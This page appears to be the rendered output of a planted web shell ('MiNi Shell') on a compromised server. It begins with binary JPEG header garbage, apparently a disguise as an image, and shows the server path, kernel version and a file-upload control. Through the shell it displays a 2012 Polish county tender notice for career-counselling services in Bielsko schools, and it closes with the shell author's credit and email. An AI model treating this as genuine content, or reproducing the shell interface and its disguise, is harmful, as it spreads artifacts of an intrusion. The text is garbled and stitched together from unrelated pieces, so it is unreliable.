JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120919/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120919/356086-N-2012.html

<p class="kh_header"><b>Bielsko-Biała: Świadczenie usług edukacyjnych związanych z przygotowaniem i przeprowadzeniem zajęć z doradztwa zawodowego grupowego i indywidualnego dla uczniów szkół ponadgimnazjalnych w Powiecie Bielskim w roku szkolnym 2012/2013 i 2013/2014, w ramach projektu pn.: Mam zawód - mam pracę w regionie współfinansowanego ze środków Europejskiego Funduszu Społecznego, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.</b><br>
<b>Numer ogłoszenia: 356086 - 2012; data zamieszczenia: 19.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Bielski , ul. Piastowska 40, 43-300 Bielsko-Biała, woj. śląskie, tel. 033 8136800, faks 033 8220672.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.bielsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług edukacyjnych związanych z przygotowaniem i przeprowadzeniem zajęć z doradztwa zawodowego grupowego i indywidualnego dla uczniów szkół ponadgimnazjalnych w Powiecie Bielskim w roku szkolnym 2012/2013 i 2013/2014, w ramach projektu pn.: Mam zawód - mam pracę w regionie współfinansowanego ze środków Europejskiego Funduszu Społecznego, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usług edukacyjnych związanych z przygotowaniem i przeprowadzeniem zajęć z doradztwa zawodowego grupowego i indywidualnego dla uczniów szkół ponadgimnazjalnych w Powiecie Bielskim w roku szkolnym 2012/2013 i 2013/2014, w ramach projektu pn.: Mam zawód - mam pracę w regionie współfinansowanego ze środków Europejskiego Funduszu Społecznego, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.

1.Informacje dotyczące zakresu grupowego doradztwa zawodowego:
1)Zajęcia z doradztwa grupowego obejmować będą problematykę z zakresu poruszania się po rynku pracy (m.in. zasady pisania CV i listu motywacyjnego, przygotowanie do rozmowy kwalifikacyjnej, gry symulacyjne), podstaw przedsiębiorczości, stereotypów płci, zasad równości, równouprawnienia           i przykładów dyskryminacji na rynku pracy. 
2)Doradztwo grupowe będzie prowadzone w oparciu o materiały dydaktyczne przekazane przez Zamawiającego tj. podręcznik dla konsultantów zawodowych - Mam zawód - mam pracę w regionie przygotowany przez pracowników Kuratorium Oświaty w Katowicach tj. M. Lipniak, K. Szymczyk i Z. Martyniak, wydany przez ATKiN Sp. z. o. o. - stanowiącym Załącznik   nr 1 do SIWZ.
3)W ramach ostatnich zajęć z doradztwa grupowego konsultant przeprowadzi  z uczestnikami ankiety zgodnie ze wzorem przekazanym przez Zamawiającego. Wypełnione przez uczestników ankiety Wykonawca przekaże Zamawiającemu.
4)Do przeprowadzenia zajęć Zamawiający zapewni konsultantowi zawodowemu bezpłatnie sale wykładowe znajdujące się w Zespole Szkół wskazanym            w opisie przedmiotu zamówienia, które Wykonawca będzie realizował. Wykonawca pokrywa koszty dojazdu do sal wykładowych oraz wszelkie inne koszty związane ze świadczeniem usługi w tym wydruki materiałów. 
5)Zakres zamówień obejmuje grupowe doradztwo zawodowe na rzecz uczniów szkół ponadgimnazjalnych:
-w roku szkolnym 2012/2013 dla 4 grup, około 75 osób w wymiarze 96 godzin lekcyjnych (godzina lekcyjna 45 minut) dla każdej grupy,
-w roku szkolnym 2013/2014 dla 2 grup, około 38 osób w wymiarze 48 godzin lekcyjnych (godzina lekcyjna 45 minut) dla każdej grupy.
6)Maksymalna suma godzin warsztatów grupowych wynosi 144 godzin lekcyjnych.
7)Maksymalna liczba uczestników warsztatów grupowych wynosić będzie 113 uczniów.
8)Zajęcia konsultacyjne powinny zostać przeprowadzone w godzinach niepokrywających się z godzinami zajęć lekcyjnych uczniów w dni nauki szkolnej. Podział godzin (harmonogram) zostanie ustalony wspólnie                 z dyrektorami w/w szkół. Zakres zamówienia obejmuje grupowe doradztwo zawodowe na rzecz uczniów w wymiarze 24 godzin lekcyjnych/na grupę (po 45 minut każda). 
9)Wykonawca zobowiązany jest do sporządzania i prowadzenia dokumentacji wykonanych usług na zasadach i w formie wskazanej przez Zamawiającego. Wykonawca w ciągu 2 dni po zrealizowaniu zamówienia zobowiązany jest do przekazywania Zamawiającemu następujących dokumentów: 
-Dziennika  zajęć zawierającego:
a)wykaz uczestników z danymi osobowymi (imię i nazwisko, adres zamieszkania, nr PESEL),
b)harmonogram zajęć (program, tematy, datę i czas trwania zajęć),
c)listy obecności uczestników na każdy dzień zajęć, 
d)rejestr potwierdzeń przez uczestników doradztwa odbioru zaświadczeń /certyfikatów. 
-Ankiety i opinie według wzoru określonego przez Zamawiającego. 
Wykonawca zobowiązany jest dostarczyć wyżej wymienione dokumenty po zakończeniu realizacji usługi na rzecz poszczególnej grupy. Listy obecności oraz wypełnione przez uczestników ankiety będą stanowiły podstawę stwierdzenia realizacji zamówienia. Sporządzona dokumentacja powinna być odpowiednio oznaczona logotypami Unii Europejskiej, Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, zgodne z wytycznymi z dnia 4 lutego 2008r. Departamentu zarządzania Europejskim Funduszem Społecznym Ministra Rozwoju Regionalnego - podanymi na stronie internetowej  www.efs.gov.pl.
2. Informacje dotyczące zakresu indywidualnego doradztwa zawodowego:
1)Grupa uczniów będących odbiorcami doradztwa indywidualnego zostanie wyłoniona z grupy uczniów będących uczestnikami zajęć doradztwa grupowego.
2)Realizacja indywidualnych konsultacji z zakresu doradztwa zawodowego będzie prowadzona w oparciu o przekazany podręcznik dla konsultantów zawodowych - zgodnie z Załącznikiem  nr 1 do SIWZ.
3)Zajęcia mają na celu ukierunkowanie ucznia na rozwój zawodowy oraz opracowanie Indywidualnego Planu Rozwoju Zawodowego. Na podstawie zdiagnozowanych przez konsultanta potrzeb uczniowie kierowani będą na odpowiednie do swoich predyspozycji, oczekiwań i potrzeb formy wsparcia zaplanowane w ramach projektu (tj. kursy zawodowe, zajęcia pozalekcyjne, zajęcia wyrównawcze, staże i praktyki, wizyty studyjne). 
4)Realizacja warsztatów odbędzie się w dwóch etapach dla 90 uczestników na terenie wskazanych szkół. Zamawiający przewiduje: 
-w roku szkolnym 2012/2013 - 60 osób,
-w roku szkolnym 2013/2014 - 30 osób. 
5)Liczba konsultacji średnio 9 godzin/osobę (każda godzina po 45 minut). 
6)Maksymalna suma godzin konsultacji indywidualnych wynosi:
-w roku szkolnym 2012/2013 - 540 godzin,
-w roku szkolnym 2013/2014 - 270 godzin.
7)Efektem konsultacji indywidualnych ma być sporządzenie dla każdego ucznia uczestniczącego w projekcie Indywidualnego Planu Rozwoju Zawodowego według przekazanego przez zamawiającego wzoru. 
8)W przypadku zmiany liczby osób objętych indywidualnym doradztwem zawodowym Zamawiający zapłaci za faktyczną liczbę godzin lekcyjnych indywidualnego doradztwa zawodowego. Cena jednostkowa za usługę (tj. cena za godzinę lekcyjną doradztwa) nie ulegnie zmianie, a Wykonawca nie wniesie żadnych roszczeń w stosunku do Zamawiającego. W takim przypadku rozliczenie nastąpi zgodnie z rzeczywistym wykonaniem przedmiotu umowy tj. na podstawie list obecności oraz Indywidualnych Planów Rozwoju Zawodowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 85.31.23.20-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie w/w warunku, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia, a w przypadku osoby fizycznej sam jest zdolny do wykonania zamówienia tj.: 
Dla Części 1 - Wykonawca powinien posiadać co najmniej następujące kwalifikacje:
-wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym               z zakresu pedagogiki, będąca czynną zawodowo tzn. jest aktualnie zatrudniona w szkole ponadgimnazjalnej.
Dla Części 2 - Wykonawca powinien posiadać co najmniej następujące kwalifikacje:
-wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym               z zakresu  doradztwa zawodowego, będąca czynną zawodowo tzn. jest aktualnie zatrudniona w szkole.
Dla Części 3 - Wykonawca powinien posiadać co najmniej następujące kwalifikacje:
-wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym               z zakresu  pedagogiki opiekuńczo-wychowawczej, będąca czynną zawodowo tzn. jest aktualnie zatrudniona w szkole ponadgimnazjalnej,
-lub wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym            z zakresu doradztwa zawodowego, będąca czynną zawodowo tzn. jest aktualnie zatrudniona w szkole.
Dla Części 4 - Wykonawca powinien posiadać co najmniej następujące kwalifikacje:
-Wykształcenie wyższe magisterskie w zakresie pedagogiki opiekuńczo wychowawczej lub resocjalizacji oraz posiada przygotowanie pedagogiczne, posiada również kurs kwalifikacyjny w zakresie oligofrenopedagogiki, mogąca wykazać się prowadzeniem zajęć z uczniami z upośledzeniem umysłowym, będąca czynną zawodowo tzn. jest aktualnie zatrudniona w szkole ponadgimnazjalnej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy - dla części nr 1 Załącznik nr 2a do SIWZ  dla części nr 2 Załącznik nr 2b do SIWZ, dla części nr 3 Załącznik nr 2c do SIWZ,  dla części nr 4 Załącznik nr 2d do SIWZ. 
2.	W przypadku składania oferty przez osobę fizyczną - oświadczenie Wykonawcy dla celów zgłoszenia go do Zakładu Ubezpieczeń Zdrowotnych    i Urzędu Skarbowego - Załącznik nr 8 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie przepisu art. 144 ust. 1 ustawy - Prawo Zamówień Publicznych Zamawiający dopuszcza możliwość zmiany treści umowy w stosunku do treści oferty w przypadku wystąpienia siły wyższej, uniemożliwiającej zrealizowanie zamówienia w terminie przewidzianym umową; siłę wyższą należy rozumieć jako zdarzenie zewnętrzne niemożliwe do przewidzenia, o charakterze nagłym, niezależne od woli stron i działalności ludzkiej, w szczególności: działanie żywiołów o skutku katastrofalnym - w postaci powodzi, huraganu, uderzenia pioruna, gradobicia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.bielsko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwa Powiatowego w Bielsku-Białej, 43-300 Bielsko-Biała, ul. Piastowska 40, pok. 235, II piętro bud. A..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.09.2012 godzina 09:30, miejsce: Starostwa Powiatowego w Bielsku-Białej, 43-300 Bielsko-Biała, ul. Piastowska 40, pok. 235, II piętro bud. A..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Mam zawód - mam pracę w regionie,  Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki 2011-2014.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1 - Usługa doradztwa zawodowego
-w roku szkolnym 2012/2013:
a)grupowe doradztwo zawodowe na rzecz uczniów Zespołu Szkół Silesia w Czechowicach-Dziedzicach - w grupie liczącej około 25 osób (nie mniej niż 20 osób, nie więcej niż 25 osób, 1 grupa),
b)indywidualne doradztwo zawodowe na rzecz uczniów Zespołu Szkół Silesia w Czechowicach-Dziedzicach dla 20 osób..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1 - Usługa doradztwa zawodowego
- w roku szkolnym 2012/2013:
a) grupowe doradztwo zawodowe na rzecz uczniów Zespołu Szkół Silesia w Czechowicach-Dziedzicach - w grupie liczącej około 25 osób (nie mniej niż 20 osób, nie więcej niż 25 osób, 1 grupa),
b) indywidualne doradztwo zawodowe na rzecz uczniów Zespołu Szkół Silesia w Czechowicach-Dziedzicach dla 20 osób..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 85.31.23.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2 - Usługa doradztwa zawodowego   
- w roku szkolnym 2012/2013:
a)grupowe doradztwo zawodowe na rzecz uczniów Zespołu Szkół Technicznych i Licealnych w Czechowicach-Dziedzicach - w grupie liczącej około 22 osoby (nie mniej niż 18 osób, nie więcej niż 22 osoby, 1 grupa),
b)indywidualne doradztwo zawodowe na rzecz uczniów Zespołu Szkół Technicznych i Licealnych w Czechowicach-Dziedzicach dla 18 osób..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2 - Usługa doradztwa zawodowego   
- w roku szkolnym 2012/2013:
a)grupowe doradztwo zawodowe na rzecz uczniów Zespołu Szkół Technicznych i Licealnych w Czechowicach-Dziedzicach - w grupie liczącej około 22 osoby (nie mniej niż 18 osób, nie więcej niż 22 osoby, 1 grupa),
b)indywidualne doradztwo zawodowe na rzecz uczniów Zespołu Szkół Technicznych i Licealnych w Czechowicach-Dziedzicach dla 18 osób..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 85.31.23.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część 3 - Usługa doradztwa zawodowego  
-w roku szkolnym 2012/2013:
 -w roku szkolnym 2013/2014:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 3 - Usługa doradztwa zawodowego  
-w roku szkolnym 2012/2013:
a)grupowe doradztwo zawodowe na rzecz uczniów Zespołu Szkół Technicznych i Licealnych w Czechowicach-Dziedzicach - w grupie liczącej około 22 osoby (nie mniej niż 19 osób, nie więcej niż 22 osoby,1 grupa),
b)indywidualne doradztwo zawodowe na rzecz uczniów Zespołu Szkół Technicznych i Licealnych w Czechowicach-Dziedzicach dla 19 osób.
-w roku szkolnym 2013/2014:
a)grupowe doradztwo zawodowe na rzecz uczniów Zespołu Szkół Technicznych i Licealnych w Czechowicach-Dziedzicach oraz Zespołu Szkół Silesia w Czechowicach-Dziedzicach - w grupie liczącej około 29 osób (nie mniej niż 23 osoby, nie więcej niż 29 osób, 1 grupa),
b)indywidualne doradztwo zawodowe na rzecz uczniów Zespołu Szkół Technicznych i Licealnych w Czechowicach-Dziedzicach oraz Zespołu Szkół Silesia w Czechowicach-Dziedzicach dla 23 osoby..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 85.31.23.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część 4 - Usługa doradztwa zawodowego  
-w roku szkolnym 2012/2013:
-w roku szkolnym 2013/2014:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 4 - Usługa doradztwa zawodowego  
-w roku szkolnym 2012/2013:
a)grupowe doradztwo zawodowe na rzecz uczniów Zespołu Szkół Specjalnych nr 4 w Czechowicach-Dziedzicach - w grupie liczącej około 6 osób (nie mniej niż 3 osoby, nie więcej niż 6 osób, 1 grupa),
b)indywidualne doradztwo zawodowe na rzecz uczniów Zespołu Szkół Specjalnych nr 4 w Czechowicach-Dziedzicach dla 3 osoby.
-w roku szkolnym 2013/2014:
a)grupowe doradztwo zawodowe na rzecz uczniów Zespołu Szkół Specjalnych nr 4 w Czechowicach-Dziedzicach - w grupie liczącej około 9 osób (nie mniej niż  7 osób, nie więcej niż 9 osób, 1 grupa),
b)indywidualne doradztwo zawodowe na rzecz uczniów Zespołu Szkół Specjalnych nr 4 w Czechowicach-Dziedzicach dla 7 osób..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 85.31.23.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com